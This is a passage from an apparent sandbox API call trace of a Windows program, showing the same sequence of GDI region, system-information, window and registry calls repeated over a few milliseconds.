hrgnSrc1=0xae0401d3, hrgnSrc2=0xac0401d6, iMode=1) returned 1 [0088.413] CombineRgn (hrgnDst=0x1041b10, hrgnSrc1=0xae0401d3, hrgnSrc2=0xac0401d6, iMode=4) returned 2 [0088.413] CreateSolidBrush (color=0xff) returned 0x2101b0e [0088.413] CreateSolidBrush (color=0xff0000) returned 0x1101b11 [0088.413] DeleteObject (ho=0x1101b11) returned 1 [0088.413] DeleteObject (ho=0xac0401d6) returned 1 [0088.413] DeleteObject (ho=0xae0401d3) returned 1 [0088.413] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.413] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.413] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.413] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.413] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.413] BeginPath (hdc=0x0) returned 0 [0088.413] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.413] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.413] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.413] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.413] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.413] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.413] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.413] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.413] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xad0401d6 [0088.413] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xaf0401d3 [0088.413] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b12 [0088.413] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b13 [0088.414] CombineRgn (hrgnDst=0x1041b12, hrgnSrc1=0xad0401d6, hrgnSrc2=0xaf0401d3, iMode=1) returned 1 [0088.414] CombineRgn (hrgnDst=0x1041b13, hrgnSrc1=0xad0401d6, hrgnSrc2=0xaf0401d3, iMode=4) returned 2 [0088.414] CreateSolidBrush (color=0xff) returned 0x2101b11 [0088.414] CreateSolidBrush (color=0xff0000) returned 0x1101b14 [0088.414] DeleteObject (ho=0x1101b14) returned 1 [0088.414] DeleteObject (ho=0xaf0401d3) returned 1 [0088.414] DeleteObject (ho=0xad0401d6) returned 1 [0088.414] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.414] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.414] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.414] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.414] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.414] BeginPath (hdc=0x0) returned 0 [0088.414] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.414] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.414] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.414] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.414] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.414] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.414] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.414] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.414] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb00401d3 [0088.414] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xae0401d6 [0088.414] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b15 [0088.414] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b16 [0088.414] CombineRgn (hrgnDst=0x1041b15, hrgnSrc1=0xb00401d3, hrgnSrc2=0xae0401d6, iMode=1) returned 1 [0088.414] CombineRgn (hrgnDst=0x1041b16, hrgnSrc1=0xb00401d3, hrgnSrc2=0xae0401d6, iMode=4) returned 2 [0088.414] CreateSolidBrush (color=0xff) returned 0x2101b14 [0088.414] CreateSolidBrush (color=0xff0000) returned 0x1101b17 [0088.414] DeleteObject (ho=0x1101b17) returned 1 [0088.414] DeleteObject (ho=0xae0401d6) returned 1 [0088.415] DeleteObject (ho=0xb00401d3) returned 1 [0088.415] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.415] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.415] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.415] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.415] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.415] BeginPath (hdc=0x0) returned 0 [0088.415] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.415] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.415] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.415] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.415] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.415] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.415] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.415] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.415] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xaf0401d6 [0088.415] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb10401d3 [0088.415] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b18 [0088.415] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b19 [0088.415] CombineRgn (hrgnDst=0x1041b18, hrgnSrc1=0xaf0401d6, hrgnSrc2=0xb10401d3, iMode=1) returned 1 [0088.415] CombineRgn (hrgnDst=0x1041b19, hrgnSrc1=0xaf0401d6, hrgnSrc2=0xb10401d3, iMode=4) returned 2 [0088.415] CreateSolidBrush (color=0xff) returned 0x2101b17 [0088.415] CreateSolidBrush (color=0xff0000) returned 0x1101b1a [0088.415] DeleteObject (ho=0x1101b1a) returned 1 [0088.415] DeleteObject (ho=0xb10401d3) returned 1 [0088.415] DeleteObject (ho=0xaf0401d6) returned 1 [0088.415] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.415] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.415] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.415] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.416] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.416] BeginPath (hdc=0x0) returned 0 [0088.416] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.416] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.416] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.416] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.416] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.416] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.416] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.416] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.416] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb20401d3 [0088.416] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb00401d6 [0088.416] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b1b [0088.416] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b1c [0088.416] CombineRgn (hrgnDst=0x1041b1b, hrgnSrc1=0xb20401d3, hrgnSrc2=0xb00401d6, iMode=1) returned 1 [0088.416] CombineRgn (hrgnDst=0x1041b1c, hrgnSrc1=0xb20401d3, hrgnSrc2=0xb00401d6, iMode=4) returned 2 [0088.416] CreateSolidBrush (color=0xff) returned 0x2101b1a [0088.416] CreateSolidBrush (color=0xff0000) returned 0x1101b1d [0088.416] DeleteObject (ho=0x1101b1d) returned 1 [0088.416] DeleteObject (ho=0xb00401d6) returned 1 [0088.416] DeleteObject (ho=0xb20401d3) returned 1 [0088.416] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.416] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.416] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.416] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.416] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.416] BeginPath (hdc=0x0) returned 0 [0088.416] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.416] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.416] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.416] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.416] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.416] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.417] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.417] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.417] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb10401d6 [0088.417] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb30401d3 [0088.417] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b1e [0088.417] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b1f [0088.417] CombineRgn (hrgnDst=0x1041b1e, hrgnSrc1=0xb10401d6, hrgnSrc2=0xb30401d3, iMode=1) returned 1 [0088.417] CombineRgn (hrgnDst=0x1041b1f, hrgnSrc1=0xb10401d6, hrgnSrc2=0xb30401d3, iMode=4) returned 2 [0088.417] CreateSolidBrush (color=0xff) returned 0x2101b1d [0088.417] CreateSolidBrush (color=0xff0000) returned 0x1101b20 [0088.417] DeleteObject (ho=0x1101b20) returned 1 [0088.417] DeleteObject (ho=0xb30401d3) returned 1 [0088.417] DeleteObject (ho=0xb10401d6) returned 1 [0088.417] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.417] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.417] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.417] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.417] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.417] BeginPath (hdc=0x0) returned 0 [0088.417] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.417] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.417] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.417] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.417] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.417] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.418] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.418] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.418] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb40401d3 [0088.418] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb20401d6 [0088.418] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b21 [0088.418] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b22 [0088.418] CombineRgn (hrgnDst=0x1041b21, hrgnSrc1=0xb40401d3, hrgnSrc2=0xb20401d6, iMode=1) returned 1 [0088.418] CombineRgn (hrgnDst=0x1041b22, hrgnSrc1=0xb40401d3, hrgnSrc2=0xb20401d6, iMode=4) returned 2 [0088.418] CreateSolidBrush (color=0xff) returned 0x2101b20 [0088.418] CreateSolidBrush (color=0xff0000) returned 0x1101b23 [0088.418] DeleteObject (ho=0x1101b23) returned 1 [0088.418] DeleteObject (ho=0xb20401d6) returned 1 [0088.418] DeleteObject (ho=0xb40401d3) returned 1 [0088.418] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.418] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.418] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.418] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.418] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.418] BeginPath (hdc=0x0) returned 0 [0088.418] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.418] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.418] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.418] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.418] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.418] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.418] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.418] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.419] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb30401d6 [0088.419] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb50401d3 [0088.419] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b24 [0088.419] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b25 [0088.419] CombineRgn (hrgnDst=0x1041b24, hrgnSrc1=0xb30401d6, hrgnSrc2=0xb50401d3, iMode=1) returned 1 [0088.419] CombineRgn (hrgnDst=0x1041b25, hrgnSrc1=0xb30401d6, hrgnSrc2=0xb50401d3, iMode=4) returned 2 [0088.419] CreateSolidBrush (color=0xff) returned 0x2101b23 [0088.419] CreateSolidBrush (color=0xff0000) returned 0x1101b26 [0088.419] DeleteObject (ho=0x1101b26) returned 1 [0088.419] DeleteObject (ho=0xb50401d3) returned 1 [0088.419] DeleteObject (ho=0xb30401d6) returned 1 [0088.419] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.419] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.419] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.419] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.419] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.419] BeginPath (hdc=0x0) returned 0 [0088.419] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.419] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.419] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.419] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.419] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.419] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.419] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.419] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.419] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb60401d3 [0088.419] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb40401d6 [0088.419] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b27 [0088.419] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b28 [0088.420] CombineRgn (hrgnDst=0x1041b27, hrgnSrc1=0xb60401d3, hrgnSrc2=0xb40401d6, iMode=1) returned 1 [0088.420] CombineRgn (hrgnDst=0x1041b28, hrgnSrc1=0xb60401d3, hrgnSrc2=0xb40401d6, iMode=4) returned 2 [0088.420] CreateSolidBrush (color=0xff) returned 0x2101b26 [0088.420] CreateSolidBrush (color=0xff0000) returned 0x1101b29 [0088.420] DeleteObject (ho=0x1101b29) returned 1 [0088.420] DeleteObject (ho=0xb40401d6) returned 1 [0088.420] DeleteObject (ho=0xb60401d3) returned 1 [0088.420] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.420] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.420] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.420] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.420] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.420] BeginPath (hdc=0x0) returned 0 [0088.420] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.420] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.420] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.420] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.420] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.420] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.420] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.420] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.420] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb50401d6 [0088.420] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb70401d3 [0088.420] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b2a [0088.420] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041b2b [0088.420] CombineRgn (hrgnDst=0x1041b2a, hrgnSrc1=0xb50401d6, hrgnSrc2=0xb70401d3, iMode=1) returned 1 [0088.420] CombineRgn (hrgnDst=0x1041b2b, hrgnSrc1=0xb50401d6, hrgnSrc2=0xb70401d3, iMode=4) returned 2 [0088.420] CreateSolidBrush (color=0xff) returned 0x2101b29 [0088.420] CreateSolidBrush (color=0xff0000) returned 0x1101b2c [0088.420] DeleteObject (ho=0x1101b2c) returned 1 [0088.420] DeleteObject (ho=0xb70401d3) returned 1 [0088.420] DeleteObject (ho=0xb50401d6) returned 1 [0088.420] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.420] GetSystemInfo (in: lpSystemInfo=0x1817e8 | 